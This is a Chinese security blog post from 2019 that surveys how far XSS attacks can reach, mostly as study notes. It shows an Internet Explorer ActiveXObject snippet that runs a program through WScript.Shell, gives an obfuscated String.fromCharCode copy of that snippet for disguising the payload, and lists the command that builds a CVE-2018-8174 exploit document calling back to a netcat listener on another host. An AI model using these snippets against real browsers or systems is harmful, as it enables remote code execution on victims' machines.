目录
  1. 1. 0x01 Chrome DevTools
  2. 2. 0x02 XSS payloads
  3. 3. 0x03 ActiveXObject 从 XSS 到 RCE (IE)
  4. 4. 0x04 CVE-2018-8174
  5. 5. 0x05 SVG XSS
How dangerous is XSS?

最近在网上看师傅们面试各大厂的面试经历和心得体会文章。然后被某问题吸引…

能想到XSS的最大攻击面是什么?

发现学的知识点都是 XSS 漏洞的挖掘和一些 Bypass。对于XSS的攻击面的研究并不深入。于是又看了很多网上的文章,下面对XSS的攻击面进行小结。

0x01 Chrome DevTools

首先很重要的是在 Chrome DevTools 中调试 JavaScript。
Chrome的调试技巧
在 Chrome DevTools 中调试 JavaScript 入门

0x02 XSS payloads

一个 XSS payloads的网站 —— xss-payloads

含有很多之前没用过的姿势,看了些代码,发现JS基础的匮乏,慢慢研究吧~

关于 XSS payload 通过各种编码,拼接等方式 bypass 的方式就不谈了。
顺便一提:不仅只是alert, promptconfirm 也可以弹窗

0x03 ActiveXObject 从 XSS 到 RCE (IE)

ActiveX控件是Microsoft的ActiveX技术的一部分。ActiveX控件是可以在应用程序和网络中计算机上重复使用的程序对象。创建它的主要技术是Microsoft的ActiveX技术,其中主要是组件对象模型(COM)。ActiveX控件可以以小程序下载装入网页,也可以用在一般的Windows和Macintosh应用程序环境中。一般说来,ActiveX 控件代替了原先的OCX,它与JAVAapplet的概念和功能差不多。ActiveX控件可以由不同的可以
识别Microsoft的COM技术的语言开发,它是一个组件或自包含的软件包,它可以在同一个或分布式的计算环境中开发或使用。COM的分布式支持技术称为DCOM。在实现中,ActiveX控件是一个动态链接库(DLL)模块,它包括在容器(包括COM程序接口的应用程序)当中。这种可重复使用的组件技术可以加快开发速度和质量

首先更改 IE 浏览器安全配置

控制台运行

var o = new ActiveXObject("WScript.Shell");
o.run("calc.exe");

如需伪装payload,可对js代码进行加密,加密后得

String.fromCharCode(10,118,97,114,32,111,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,39,87,83,99,114,105,112,116,46,115,104,101,108,108,39,41,59,10,111,46,114,117,110,40,39,99,97,108,99,46,101,120,101,39,41,59,10)

0x04 CVE-2018-8174

漏洞描述:
CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的32位 IE浏览器及使用了IE内核的应用程序。

这条感染链包含如下几个环节:
1、受害者收到一个恶意Microsoft Word文档/html页面。
2、打开这个恶意文档后,样本会下载第二阶段的利用程序,即包含VBScript代码的HTML页面。
3、VBScript代码会触发UAF(Use After Free,释放后重用)漏洞并执行shellcode。

漏洞利用exp下载地址:https://github.com/Yt1g3r/CVE-2018-8174_EXP

可选参数:-h,–help显示此帮助消息并退出-u URL,–url URL exp url -o OUTPUT,–output OUTPUT输出利用rtf -i IP,–ip IP表示netcat -p PORT ,–port netcat的端口

生成恶意页面
python CVE-2018-8174.py -u http://192.168.3.98/exploit.html -o exploit.rtf -i 192.168.3.98 -p 4444

0x05 SVG XSS

文章作者: P2hm1n
文章链接: http://yoursite.com/2019/12/20/How-dangerous-is-XSS/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 P2hm1n‘s Blog

评论